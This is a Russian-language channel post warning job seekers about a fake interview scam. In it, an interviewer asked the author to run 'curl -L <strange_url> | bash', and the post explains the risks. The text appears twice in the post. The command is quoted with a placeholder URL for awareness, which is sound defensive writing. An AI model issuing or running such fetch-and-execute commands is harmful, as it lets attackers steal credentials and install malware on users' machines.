Авторский канал о реальных возможностях IT, автоматизации и AI.
Сложное объясняю просто и понятно, чтобы вы могли применять сразу.
Автор: @gvargin
Post #259
80

Чуть не отдал мошенникам доступ к своему компьютеру прямо на собеседовании
На прошлой неделе я чуть не стал жертвой довольно неприятной схемы.
Началось всё максимально обычно.
HR написал мне в LinkedIn и предложил пообщаться. Роль выглядела так, будто её специально собирали под меня: AI + Blockchain, позиция технического Product Manager.
Было немного лень, но в пятницу вечером я всё-таки согласился на звонок — просто узнать подробности.
На интервью пришёл некий Peter. Слышно его было плохо, и почти сразу он предложил выключить камеры.
Дальше всё шло вполне стандартно: представились, немного поговорили про компанию, проект, мой опыт.
А потом сценарий резко изменился.
Мне предложили расшарить экран и запустить их прототип для небольшого demo.
Сначала попросили открыть Cursor и развернуть проект. Cursor у меня на ноутбуке не оказалось.
Тогда предложили просто выполнить команду в терминале:
На этом разговор закончился.
Если коротко, эта конструкция делает следующее:
curl скачивает что-то с удалённого сервера
-L разрешает переходы по редиректам
а | bash сразу передаёт скачанный код на выполнение.
Что именно там будет выполнено — вы заранее не знаете.
Это может быть безобидный скрипт. А может быть что угодно: кража токенов, паролей, SSH-ключей, доступ к браузеру, файлам или дальнейшая установка malware.
Мне в этой ситуации, пожалуй, повезло сразу по двум причинам.
Во-первых, я знаю, что означает такая команда.
Во-вторых, я сейчас не замотивирован менять работу, чтобы бездумно выполнять всё, что просят на интервью.
Но если человек долго ищет работу, находится в стрессе и очень хочет получить оффер, сопротивляться таким просьбам становится намного сложнее.
Поэтому простое правило: не запускайте на своём компьютере неизвестные команды, скрипты, приложения или проекты только потому, что вас попросили сделать это на собеседовании.
Будьте осторожны и не стесняйтесь использовать AI-чат, чтобы сначала разобраться, что именно от вас хотят.
На прошлой неделе я чуть не стал жертвой довольно неприятной схемы.
Началось всё максимально обычно.
HR написал мне в LinkedIn и предложил пообщаться. Роль выглядела так, будто её специально собирали под меня: AI + Blockchain, позиция технического Product Manager.
Было немного лень, но в пятницу вечером я всё-таки согласился на звонок — просто узнать подробности.
На интервью пришёл некий Peter. Слышно его было плохо, и почти сразу он предложил выключить камеры.
Дальше всё шло вполне стандартно: представились, немного поговорили про компанию, проект, мой опыт.
А потом сценарий резко изменился.
Мне предложили расшарить экран и запустить их прототип для небольшого demo.
Сначала попросили открыть Cursor и развернуть проект. Cursor у меня на ноутбуке не оказалось.
Тогда предложили просто выполнить команду в терминале:
curl -L '<strange_url>' | bash
На этом разговор закончился.
Если коротко, эта конструкция делает следующее:
curl скачивает что-то с удалённого сервера
-L разрешает переходы по редиректам
а | bash сразу передаёт скачанный код на выполнение.
Что именно там будет выполнено — вы заранее не знаете.
Это может быть безобидный скрипт. А может быть что угодно: кража токенов, паролей, SSH-ключей, доступ к браузеру, файлам или дальнейшая установка malware.
Мне в этой ситуации, пожалуй, повезло сразу по двум причинам.
Во-первых, я знаю, что означает такая команда.
Во-вторых, я сейчас не замотивирован менять работу, чтобы бездумно выполнять всё, что просят на интервью.
Но если человек долго ищет работу, находится в стрессе и очень хочет получить оффер, сопротивляться таким просьбам становится намного сложнее.
Поэтому простое правило: не запускайте на своём компьютере неизвестные команды, скрипты, приложения или проекты только потому, что вас попросили сделать это на собеседовании.
Будьте осторожны и не стесняйтесь использовать AI-чат, чтобы сначала разобраться, что именно от вас хотят.
- 😱 10
- 👍 8












